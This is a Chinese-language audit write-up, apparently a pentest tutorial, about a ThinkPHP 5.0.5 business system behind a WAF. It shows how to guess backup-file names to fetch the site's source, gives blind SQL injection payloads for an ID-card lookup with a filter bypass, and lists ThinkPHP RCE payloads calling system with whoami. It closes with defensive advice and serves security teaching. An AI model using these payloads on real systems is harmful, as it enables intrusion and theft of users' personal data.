ThinkPHP5.0.5二次开发代码审计实战教学文档<\/h1>

0x01 开始<\/h2>

基本信息<\/h3>

目标系统：基于ThinkPHP5.0.5二次开发的业务系统<\/li>

防护措施：存在某武盾WAF防护<\/li> <\/ul>

关键点：信息收集与备份文件获取<\/h3>

备份文件字典构建<\/strong>：<\/p>

结合目标公司名称关键字和域名关键字构建敏感备份文件字典<\/li>
常见备份文件命名模式：
关键字+backup.tar.gz 关键字+buckup.zip 关键字+buckup.rar 关键字+buckup.zip.tar www+关键字.zip www+关键字.rar 关键字.zip 关键字.rar <\/code><\/pre> <\/li> 可自由组合扩展字典<\/li> 观察参数命名方式推测管理员命名习惯<\/li> <\/ul> <\/li> 实际发现<\/strong>：<\/p> 通过目录扫描发现业务系统备份文件：关键字+backup.tar.gz<\/code><\/li> <\/ul> <\/li> <\/ol> 0x02 代码审计<\/h2> 系统路由分析<\/h3> 系统基于ThinkPHP5.0.5框架开发<\/li> 需熟悉ThinkPHP目录结构（参考官方文档）<\/li> <\/ul> SQL注入漏洞分析<\/h3> 漏洞位置：身份证号查询功能<\/h4> 正常请求分析<\/strong>：<\/p> 前端仅限制输入长度，后端无任何过滤<\/li> 通过修改请求参数可获取任意用户数据<\/li> <\/ul> <\/li> 注入测试<\/strong>：<\/p> 存在WAF防护<\/li> 后端数据库为MySQL<\/li> ThinkPHP debug模式未开启<\/li> <\/ul> <\/li> 盲注Payload构造<\/strong>：<\/p> 查询user()长度<\/strong>（示例长度为14）：<\/p> POST<\/span> \/index\/index\/p_card.html HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded; charset=UTF-8<\/span> <\/span><\/span> <\/span><\/span>card=1")\/(case when length(user())=0 then 1 else 0 end)+--+ <\/span><\/span><\/code><\/pre><\/li> 查询内容<\/strong>（绕过ascii函数过滤）：<\/p> 使用char函数替代ascii函数<\/li> 使用like binary<\/code>保持大小写敏感<\/li> <\/ul> POST<\/span> \/index\/index\/p_card.html HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded; charset=UTF-8<\/span> <\/span><\/span> <\/span><\/span>card=3")\/(case when substr(user(),1,1)like binary 'a' then 1 else 0 end)+--+ <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> 漏洞特征<\/strong>：<\/p> 多处SQL直接拼接且无过滤<\/li> 相同漏洞模式存在于多个功能点<\/li> <\/ul> <\/li> <\/ol> ThinkPHP RCE漏洞分析<\/h3> 漏洞验证<\/strong>：<\/p> 存在ThinkPHP经典RCE漏洞<\/li> 本地环境可复现<\/li> <\/ul> <\/li> Payload示例<\/strong>：<\/p> POST?s=index\/index <\/span><\/span><\/span> <\/span><\/span><\/span>s=whoami&_method=__construct&method=POST&filter[]=system <\/span><\/span><\/span>aaaa=whoami&_method=__construct&method=GET&filter[]=system <\/span><\/span><\/span>_method=__construct&method=GET&filter[]=system&get[]=whoami <\/span><\/span><\/span>get[]=whaomi&_method=__construct&method=get&filter=system <\/span><\/span><\/span><\/code><\/pre><\/li> WAF绕过失败<\/strong>：<\/p> WAF拦截filter<\/code>关键字<\/li> 未找到有效绕过方法<\/li> <\/ul> <\/li> <\/ol> 0x03 参考链接<\/h2> ThinkPHP目录结构：https:\/\/www.kancloud.cn\/manual\/thinkphp5\/118008<\/li> Thinkphp5.0.5 RCE分析：https:\/\/y4er.com\/post\/thinkphp5-rce\/<\/li> <\/ol> 总结与防御建议<\/h2> 漏洞总结<\/h3> SQL注入<\/strong>：<\/p> 多处SQL语句直接拼接用户输入<\/li> 缺乏参数化查询或输入过滤<\/li> <\/ul> <\/li> RCE漏洞<\/strong>：<\/p> 未修复已知框架漏洞<\/li> 危险方法调用未做限制<\/li> <\/ul> <\/li> <\/ol> 防御建议<\/h3> SQL注入防护<\/strong>：<\/p> 使用参数化查询<\/li> 实现输入过滤机制<\/li> 启用ThinkPHP的SQL安全检测<\/li> <\/ul> <\/li> RCE防护<\/strong>：<\/p> 升级ThinkPHP框架版本<\/li> 限制危险函数调用<\/li> 配置WAF规则时考虑多种攻击向量<\/li> <\/ul> <\/li> 系统安全加固<\/strong>：<\/p> 删除或保护备份文件<\/li> 关闭调试模式<\/li> 实现最小权限原则<\/li> <\/ul> <\/li> WAF配置优化<\/strong>：<\/p> 加强SQL注入防护规则<\/li> 不依赖单一关键字拦截<\/li> 实现语义分析检测<\/li> <\/ul> <\/li> <\/ol>